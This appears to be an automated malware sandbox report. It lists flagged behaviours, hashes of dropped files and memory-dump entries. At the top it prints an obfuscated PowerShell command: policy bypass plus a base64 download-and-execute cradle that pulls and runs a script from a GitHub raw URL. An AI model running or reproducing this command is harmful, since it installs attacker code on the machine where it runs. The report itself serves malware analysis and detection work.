C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blacklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\RES5190.tmpMD5
6e3c7b357f90d8b14092ce52576d2762
SHA14f424b3a2ac5f86b5a650b984d6920c3b829a9fb
SHA25680dad56aca25de73f0ab2502cf3260f3662dac511a86306c0354f9a5ebaa0489
SHA512ce33c98c9963465a708cc610d85de962c7849a4f11a2a1f539d160a6ada2fbf9f366982b683b63171b1796389a3ce31d4b4ce86d656eda4643f34ac8de133001
-
C:\Users\Admin\AppData\Local\Temp\get-points.ps1MD5
dac6b25db50155c0c78d5bf64fb95fa3
SHA19e49c8f7a6df94acdefd0daa4c330f92f6d01d0d
SHA2566967c2ea21792d390309dfd66d56b19f89d89ba4a6fb8f39f10a8212d5e70eaf
SHA512679b3706f2c03898afb4250b1f51d5e0e7187ed923f7d7cc3a06c5f9a1e5b18bbbc46e9c2c9abd0b4b42e5e3a5b2dd668e3057063562b874119c42e855292868
-
C:\Users\Admin\AppData\Local\Temp\get-points.zipMD5
7cac19b2868c41555db4b71219217f9b
SHA1d6f77db578db3c5c572c3a944d9072ed00560dcb
SHA256d8f648e2952466c25343b095ed14591b25b29d0d1c391ca019a8d8f0a39b934a
SHA5125bafea5eed1ba0493188bb79eafda47a141281fb3258be0dfe08b6b78e5dcf731fd2142b94f95b3203fa6daad27fff1f4495ac7bdebe6eb8a9cbe31b16bfc7b6
-
C:\Users\Admin\AppData\Local\Temp\z2mm4oij\z2mm4oij.dllMD5
36c38fa0e6665f7cac1a4adfc5678b3b
SHA136fa461bb4d7cd8eb3c49ba9619aec5e5f47ec3d
SHA2569450b2dfe83775c359afe633bd8f05fd36732b127960776390606757e49848f4
SHA512a51303a60aeccaa5e58712e0ed5e54e5bb511bc6794eae79560effb125d8c80881876bd85f3a06aec1c682ca62da83d8f559f9cc9db850c3e51ca6d24c2d148e
-
\??\c:\Users\Admin\AppData\Local\Temp\z2mm4oij\CSC275C1D5BBB7C49098089648E4E3A7A1A.TMPMD5
8bdc8cf250970c8a0b92246776213531
SHA1065e1ce138893080d6e4010cdbd1935100a39104
SHA25691d1682e3c341c2d7151abc13f03aeb2481dd07b2261d302687635bef38244b4
SHA512b1a2f5259909977ebb84cc286e99e87734e4d5a9e1a23c6d670610abbcbd516428d53bd4ec2d0e2f40bcdf26825dcd16738fc947b9b19617ceef0d6e68e150a8
-
\??\c:\Users\Admin\AppData\Local\Temp\z2mm4oij\z2mm4oij.0.csMD5
6f235215132cdebacd0f793fe970d0e3
SHA12841e44c387ed3b6f293611992f1508fe9b55b89
SHA256ccad602538354ee5bbc78ab935207c36ba9910da1a7b5a10ff455e34e15f15ec
SHA512a14657bc5be862a96c1826347b551e07b47ffa6ffd7e12fbfc3437b9a48e8b8e020ae71b8ef836c357d9db6c065da962a6141272d9bc58b76a9eb9c11553d44e
-
\??\c:\Users\Admin\AppData\Local\Temp\z2mm4oij\z2mm4oij.cmdlineMD5
8c80ff39bb32ddab61996a6d0f3d4256
SHA1ab2bc98466fd5ca4be5e74222cf773efa27fda6b
SHA2561d2a15739df0da92c093e35d3d11fb4fc1bcf45cced543e41fdba5766dc01975
SHA5120207eced12d80d54c6b16e644de1ae4282aa998556895a1d3f2609303374ce32df3a4d56beea23440f88ad190b2514a0a89082ca0bd45baef91e9a32b91707a0
-
\Windows\Branding\mediasrv.pngMD5
eeb448ea2709c57b9ea2e223d0c79396
SHA138331dd027386151ee37a29a7820570a76427b02
SHA256c82a8ca8997348bc1631637799d8c88e33df3b64d23fdb006a1afdb5e0170272
SHA512c133096ce90e5693669c056a31870b982b162196508babae4d1d9eb4055f2096af9460164d68885693af56389a42977f4193906da1d19f457e26187a46a5e3fc
-
\Windows\Branding\mediasvc.pngMD5
bb873bd05a47f502ee4ed3c4ea749a4f
SHA1e55a6bf49a4833fb9e9b123df39dac9bf507f75a
SHA256a6a28143f81b007c6853cc80829c16d2aadbe427abe1408276b558f34904900a
SHA512ce2a22e5e78d3f01a6880a48153f6d3ba8ff025d7bbfe8949b7742a5b7ffa9e44484027353bb80b70e8cad8181dc26b6aabe637b5f7fd2aa4a99cd880d758548
-
memory/184-36-0x0000000000000000-mapping.dmp
-
memory/364-20-0x0000000000000000-mapping.dmp
-
memory/500-17-0x0000000000000000-mapping.dmp
-
memory/648-18-0x0000000000000000-mapping.dmp
-
memory/688-44-0x0000000000000000-mapping.dmp
-
memory/812-21-0x0000000000000000-mapping.dmp
-
memory/904-19-0x0000000000000000-mapping.dmp
-
memory/1056-22-0x0000000000000000-mapping.dmp
-
memory/1216-23-0x0000000000000000-mapping.dmp
-
memory/1316-41-0x0000000000000000-mapping.dmp
-
memory/1332-38-0x0000000000000000-mapping.dmp
-
memory/1404-24-0x0000000000000000-mapping.dmp
-
memory/1412-25-0x0000000000000000-mapping.dmp
-
memory/1492-26-0x0000000000000000-mapping.dmp
-
memory/1584-27-0x0000000000000000-mapping.dmp
-
memory/1764-7-0x0000000000000000-mapping.dmp
-
memory/2240-30-0x0000000000000000-mapping.dmp
-
memory/2376-31-0x0000000000000000-mapping.dmp
-
memory/2536-32-0x0000000000000000-mapping.dmp
-
memory/2572-40-0x0000000000000000-mapping.dmp
-
memory/2604-45-0x0000000000000000-mapping.dmp
-
memory/2604-46-0x00007FFBDEDD0000-0x00007FFBDF7BC000-memory.dmpFilesize
9.9MB
-
memory/2608-33-0x0000000000000000-mapping.dmp
-
memory/2628-35-0x0000000000000000-mapping.dmp
-
memory/3092-14-0x00000212820B0000-0x00000212820B1000-memory.dmpFilesize
4KB
-
memory/3092-2-0x0000000000000000-mapping.dmp
-
memory/3092-3-0x00007FFBDEDD0000-0x00007FFBDF7BC000-memory.dmpFilesize
9.9MB
-
memory/3092-4-0x000002129A0D0000-0x000002129A0D1000-memory.dmpFilesize
4KB
-
memory/3092-5-0x000002129B160000-0x000002129B161000-memory.dmpFilesize
4KB
-
memory/4056-43-0x0000000000000000-mapping.dmp
-
memory/4128-51-0x0000000000000000-mapping.dmp
-
memory/4188-50-0x0000000000000000-mapping.dmp
-
memory/4288-10-0x0000000000000000-mapping.dmp
-
memory/4400-16-0x0000000000000000-mapping.dmp
-
memory/4416-15-0x0000000000000000-mapping.dmp
-
memory/4496-42-0x0000000000000000-mapping.dmp
-
memory/4532-37-0x0000000000000000-mapping.dmp
-
memory/4600-34-0x0000000000000000-mapping.dmp
-
memory/4632-39-0x0000000000000000-mapping.dmp
-
memory/4636-1-0x00000000018C0000-0x00000000018C1000-memory.dmpFilesize
4KB